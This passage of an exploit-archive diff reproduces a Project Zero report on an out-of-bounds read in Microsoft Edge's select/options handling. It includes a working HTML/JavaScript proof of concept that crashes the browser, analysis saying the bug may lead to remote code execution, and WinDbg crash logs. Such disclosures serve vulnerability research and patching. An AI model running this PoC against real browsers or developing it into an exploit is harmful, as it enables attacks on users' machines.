+2d 000000eb`c42fc4f0 00007ffa`9d333a78 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
+2e 000000eb`c42fc540 00007ffa`9d35ac27 edgehtml!CJScript9Holder::ExecuteCallback+0x18
+2f 000000eb`c42fc580 00007ffa`9d35aa17 edgehtml!CListenerDispatch::InvokeVar+0x1fb
+30 000000eb`c42fc700 00007ffa`9d33247a edgehtml!CListenerDispatch::Invoke+0xdb
+31 000000eb`c42fc780 00007ffa`9d415a62 edgehtml!CEventMgr::_InvokeListeners+0x2ca
+32 000000eb`c42fc8e0 00007ffa`9d290715 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
+33 000000eb`c42fc910 00007ffa`9d2901a3 edgehtml!CEventMgr::Dispatch+0x405
+34 000000eb`c42fcbe0 00007ffa`9d37434a edgehtml!CEventMgr::DispatchEvent+0x73
+35 000000eb`c42fcc30 00007ffa`9d3ac5a2 edgehtml!COmWindowProxy::Fire_onload+0x14e
+36 000000eb`c42fcd40 00007ffa`9d3ab23e edgehtml!CMarkup::OnLoadStatusDone+0x376
+37 000000eb`c42fce00 00007ffa`9d3aa72f edgehtml!CMarkup::OnLoadStatus+0x112
+38 000000eb`c42fce30 00007ffa`9d328d93 edgehtml!CProgSink::DoUpdate+0x3af
+39 000000eb`c42fd2c0 00007ffa`9d32a550 edgehtml!GlobalWndOnMethodCall+0x273
+3a 000000eb`c42fd3c0 00007ffa`b7a31c24 edgehtml!GlobalWndProc+0x130
+3b 000000eb`c42fd480 00007ffa`b7a3156c user32!UserCallWinProcCheckWow+0x274
+3c 000000eb`c42fd5e0 00007ffa`9347d421 user32!DispatchMessageWorker+0x1ac
+3d 000000eb`c42fd660 00007ffa`9347c9e1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
+3e 000000eb`c42ff8b0 00007ffa`ad7e9586 EdgeContent!LCIETab_ThreadProc+0x2c1
+3f 000000eb`c42ff9d0 00007ffa`b7978364 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
+40 000000eb`c42ffa00 00007ffa`ba0a70d1 KERNEL32!BaseThreadInitThunk+0x14
+41 000000eb`c42ffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21
+
+0:013> r
+rax=00000284bc287fd8 rbx=00000284bc287f90 rcx=00000000abcdbbbb
+rdx=0000000000000000 rsi=0000000000000017 rdi=0000000000000000
+rip=00007ffa9d5f15ea rsp=000000ebc42f8da0 rbp=000000ebc42f8fb0
+ r8=0000000000000017  r9=000000ebc42f8e78 r10=00000fff53a47750
+r11=0000000000010000 r12=0000027cb4fbcd10 r13=0000027cb4f95a78
+r14=000000ebc42f8e70 r15=0000000000000000
+iopl=0         nv up ei pl nz na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
+00007ffa`9d5f15ea 488b01          mov     rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????
+
+0:013> u 00007ffa`9d5f15ea
+edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
+00007ffa`9d5f15ea 488b01          mov     rax,qword ptr [rcx]
+00007ffa`9d5f15ed 488b80d0050000  mov     rax,qword ptr [rax+5D0h]
+00007ffa`9d5f15f4 ff15c654ab00    call    qword ptr [edgehtml!_guard_dispatch_icall_fptr (00007ffa`9e0a6ac0)]
+
+=========================================
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42758.zip

platforms/windows/dos/42759.html

@@ -0,0 +1,230 @@
+<!--
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1301
+
+There is an out-of-bounds read issue in Microsoft Edge that could potentially be turned into remote code execution. The vulnerability has been confirmed on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393) as well as Microsoft Edge 40.15063.0.0 (Microsoft EdgeHTML 15.15063).
+
+PoC:
+
+==========================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<script>
+function go() {
+  select1.multiple = false;
+  var optgroup = document.createElement("optgroup");
+  select1.add(optgroup);
+  var options = select1.options;
+  select2 = document.createElement("select");
+  textarea.setSelectionRange(0,1000000);
+  select1.length = 2;
+  document.getElementsByTagName('option')[0].appendChild(textarea);
+  select1.multiple = true;
+  textarea.setSelectionRange(0,1000000);
+  document.execCommand("insertOrderedList", false);
+  select2.length = 100;
+  select2.add(optgroup);
+  //alert(options.length);
+  var test = options[4];
+  //alert(test);
+}
+</script>
+<body onload=go()>
+<textarea id="textarea"></textarea>
+<select id="select1" contenteditable="true"></select>
+
+<!--
+=========================================
+
+Preliminary analysis:
+
+When opening the PoC in Edge under normal circumstances, the content process will occasionally crash somewhere inside Js::CustomExternalObject::GetItem  (see Debug Log 1 below) which corresponds to  'var test = options[4];' line in the PoC. Note that multiple page refreshes are usually needed to get the crash.
+
+The real cause of the crash can be seen if Page Heap is applied to the MicrosoftEdgeCP.exe process and MemGC is disabled with OverrideMemoryProtectionSetting=0 registry flag (otherwise Page Heap settings won't apply to the MemGC heap). In that case an out-of-bounds read can be reliably observed in COptionsCollectionCacheItem::GetAt function (see Debug Log 2 below). What happens is that Edge thinks 'options' array contains 102 elements (this can be verified by uncommenting 'alert(options.length);' line in the PoC), however in reality the Options cache buffer is going to be smaller and only contain 2 elements. Thus if an attacker requests an object that is past the end of the cache buffer (note: the offset is chosen by the attacker) an incorrect object may be returned which can potentially be turned into a remote code execution.
+
+Note: Debug logs were obtained on an older version of Edge for which symbols were available. However I verified that the bug also affects the latest version.
+
+Debug log 1:
+
+=========================================
+
+(1790.17bc): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+chakra!Js::CrossSite::MarshalVar+0x37:
+00007ffa`c8dc23f7 488b4808        mov     rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????
+
+0:010> k
+ # Child-SP          RetAddr           Call Site
+00 00000071`3ecfb090 00007ffa`c8dc0c92 chakra!Js::CrossSite::MarshalVar+0x37
+01 00000071`3ecfb0c0 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x1c2
+02 00000071`3ecfb1a0 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
+03 00000071`3ecfb200 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
+04 00000071`3ecfb290 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
+05 00000071`3ecfb2f0 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
+06 00000071`3ecfb380 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
+07 00000071`3ecfb3c0 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
+08 00000071`3ecfb450 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
+09 00000071`3ecfb4b0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
+0a 00000071`3ecfb860 000001b7`d68e0fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
+0b 00000071`3ecfb8b0 00007ffa`c8e77273 0x000001b7`d68e0fb2
+0c 00000071`3ecfb8e0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
+0d 00000071`3ecfb930 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+0e 00000071`3ecfb990 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
+0f 00000071`3ecfb9e0 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
+10 00000071`3ecfba70 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
+11 00000071`3ecfbad0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
+12 00000071`3ecfbe20 000001b7`d68e0fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
+13 00000071`3ecfbe70 00007ffa`c8e77273 0x000001b7`d68e0fba
+14 00000071`3ecfbea0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
+15 00000071`3ecfbef0 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+16 00000071`3ecfbf50 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
+17 00000071`3ecfc040 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
+18 00000071`3ecfc0b0 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
+19 00000071`3ecfc150 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
+1a 00000071`3ecfc1e0 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
+1b 00000071`3ecfc280 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
+1c 00000071`3ecfc2d0 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
+1d 00000071`3ecfc310 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
+1e 00000071`3ecfc490 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
+1f 00000071`3ecfc510 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
+20 00000071`3ecfc670 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
+21 00000071`3ecfc6a0 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
+22 00000071`3ecfc970 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
+23 00000071`3ecfc9c0 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
+24 00000071`3ecfcad0 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
+25 00000071`3ecfcb90 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
+26 00000071`3ecfcbc0 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
+27 00000071`3ecfd050 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
+28 00000071`3ecfd150 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
+29 00000071`3ecfd210 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
+2a 00000071`3ecfd370 00007ffa`c0cccdf1 user32!DispatchMessageWorker+0x1ac
+2b 00000071`3ecfd3f0 00007ffa`c0ccc3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
+2c 00000071`3ecff640 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
+2d 00000071`3ecff760 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
+2e 00000071`3ecff790 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
+2f 00000071`3ecff7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
+
+0:010> r
+rax=00000001afccb7d4 rbx=000001b7d669fd80 rcx=ffff000000000000
+rdx=00000001afccb7d4 rsi=000001afce6556d0 rdi=000000713ecfb250
+rip=00007ffac8dc23f7 rsp=000000713ecfb090 rbp=000000713ecfb141
+ r8=0000000000000000  r9=000001b7d8a94bd0 r10=0000000000000005
+r11=000001b7d9ebcee0 r12=0000000000000003 r13=0001000000000004
+r14=0000000000000004 r15=000001afce6556d0
+iopl=0         nv up ei pl zr na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+chakra!Js::CrossSite::MarshalVar+0x37:
+00007ffa`c8dc23f7 488b4808        mov     rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????
+
+=========================================
+
+
+Debug log 2 (with Page Heap on for MicrosoftEdgeCP.exe and MemGC disabled):
+
+=========================================
+
+(de8.13c8): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
+00007ffa`c96b1581 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????
+
+0:010> k
+ # Child-SP          RetAddr           Call Site
+00 00000091`94ffb2c0 00007ffa`c9569bb2 edgehtml!COptionsCollectionCacheItem::GetAt+0x51
+01 00000091`94ffb2f0 00007ffa`c8dc0c51 edgehtml!CElementCollectionTypeOperations::GetOwnItem+0x122
+02 00000091`94ffb330 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x181
+03 00000091`94ffb410 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
+04 00000091`94ffb470 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
+05 00000091`94ffb500 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
+06 00000091`94ffb560 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
+07 00000091`94ffb5f0 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
+08 00000091`94ffb630 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
+09 00000091`94ffb6c0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
+0a 00000091`94ffb720 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
+0b 00000091`94ffbad0 000001b6`4f600fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
+0c 00000091`94ffbb20 00007ffa`c8e77273 0x000001b6`4f600fb2
+0d 00000091`94ffbb50 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
+0e 00000091`94ffbba0 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+0f 00000091`94ffbc00 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
+10 00000091`94ffbc50 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
+11 00000091`94ffbce0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
+12 00000091`94ffbd40 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
+13 00000091`94ffc090 000001b6`4f600fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
+14 00000091`94ffc0e0 00007ffa`c8e77273 0x000001b6`4f600fba
+15 00000091`94ffc110 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
+16 00000091`94ffc160 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
+17 00000091`94ffc1c0 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
+18 00000091`94ffc2b0 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
+19 00000091`94ffc320 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
+1a 00000091`94ffc3c0 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
+1b 00000091`94ffc450 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
+1c 00000091`94ffc4f0 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
+1d 00000091`94ffc540 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
+1e 00000091`94ffc580 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
+1f 00000091`94ffc700 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
+20 00000091`94ffc780 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
+21 00000091`94ffc8e0 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
+22 00000091`94ffc910 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
+23 00000091`94ffcbe0 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
+24 00000091`94ffcc30 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
+25 00000091`94ffcd40 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
+26 00000091`94ffce00 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
+27 00000091`94ffce30 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
+28 00000091`94ffd2c0 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
+29 00000091`94ffd3c0 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
+2a 00000091`94ffd480 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
+2b 00000091`94ffd5e0 00007ffa`c0d2cdf1 user32!DispatchMessageWorker+0x1ac
+2c 00000091`94ffd660 00007ffa`c0d2c3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
+2d 00000091`94fff8b0 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
+2e 00000091`94fff9d0 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
+2f 00000091`94fffa00 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
+30 00000091`94fffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21
+
+0:010> r
+rax=000001b652742fe0 rbx=0000000000000004 rcx=000001b64f877f30
+rdx=0000000000000004 rsi=0000000000000000 rdi=000001b651ecffd0
+rip=00007ffac96b1581 rsp=0000009194ffb2c0 rbp=000001b64f3bcc60
+ r8=0000000000000005  r9=000001b651ed9e50 r10=0000000000000005
+r11=000001b65343ef20 r12=0000009194ffb370 r13=0001000000000004
+r14=0000000000000000 r15=0000000000000004
+iopl=0         nv up ei ng nz na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010286
+edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
+00007ffa`c96b1581 488b04d0        mov     rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????
+
+0:010> !heap -p -a 000001b6`52742ff0
+    address 000001b652742ff0 found in
+    _DPH_HEAP_ROOT @ 1ae3fae1000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                             1b652a5fd68:      1b652742fe0               20 -      1b652742000             2000
+    00007ffae783fd99 ntdll!RtlDebugAllocateHeap+0x000000000003bf65
+    00007ffae782db7c ntdll!RtlpAllocateHeap+0x0000000000083fbc
+    00007ffae77a8097 ntdll!RtlpAllocateHeapInternal+0x0000000000000727
+    00007ffac9958547 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x0000000000010457
+    00007ffac96d1483 edgehtml!CImplAry::EnsureSizeWorker+0x0000000000000093
+    00007ffac9882261 edgehtml!CImplPtrAry::Append+0x0000000000000051
+    00007ffac9589543 edgehtml!CSelectElement::AppendOption+0x000000000000002f
+    00007ffac95892e1 edgehtml!CSelectElement::BuildOptionsCache+0x00000000000000e1
+    00007ffac9e7f044 edgehtml!CSelectElement::Morph+0x00000000000000d0
+    00007ffac9a4e7cf edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x00000000001066df
+    00007ffac9605f85 edgehtml!SetNumberPropertyHelper<long,CSetIntegerPropertyHelper>+0x0000000000000255
+    00007ffac9605d23 edgehtml!NUMPROPPARAMS::SetNumberProperty+0x000000000000003b
+    00007ffac9605bda edgehtml!CBase::put_BoolHelper+0x000000000000004a
+    00007ffac9c6f1d1 edgehtml!CFastDOM::CHTMLSelectElement::Trampoline_Set_multiple+0x000000000000013d
+    00007ffac9916b55 edgehtml!CFastDOM::CHTMLSelectElement::Profiler_Set_multiple+0x0000000000000025
+    00007ffac8ce6d07 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x0000000000000177
+    00007ffac8dc2640 chakra!Js::LeaveScriptObject<1,1,0>::LeaveScriptObject<1,1,0>+0x0000000000000180
+    00007ffac8e62209 chakra!Js::JavascriptOperators::CallSetter+0x00000000000000a9
+    00007ffac8de7151 chakra!Js::CacheOperators::TrySetProperty<1,1,1,1,1,1,0,1>+0x00000000000002d1
+    00007ffac8de6ce6 chakra!Js::ProfilingHelpers::ProfiledStFld<0>+0x00000000000000d6
+    00007ffac8d89a70 chakra!Js::InterpreterStackFrame::OP_ProfiledSetProperty<Js::OpLayoutT_ElementCP<Js::LayoutSizePolicy<0> > const >+0x0000000000000070
+    00007ffac8d8e800 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x0000000000000340
+    00007ffac8d8c852 chakra!Js::InterpreterStackFrame::Process+0x0000000000000142
+    00007ffac8d90920 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x00000000000004a0
+    00007ffac8d92065 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x0000000000000055
+    000001b64f600fb2 +0x000001b64f600fb2
+
+=========================================
+-->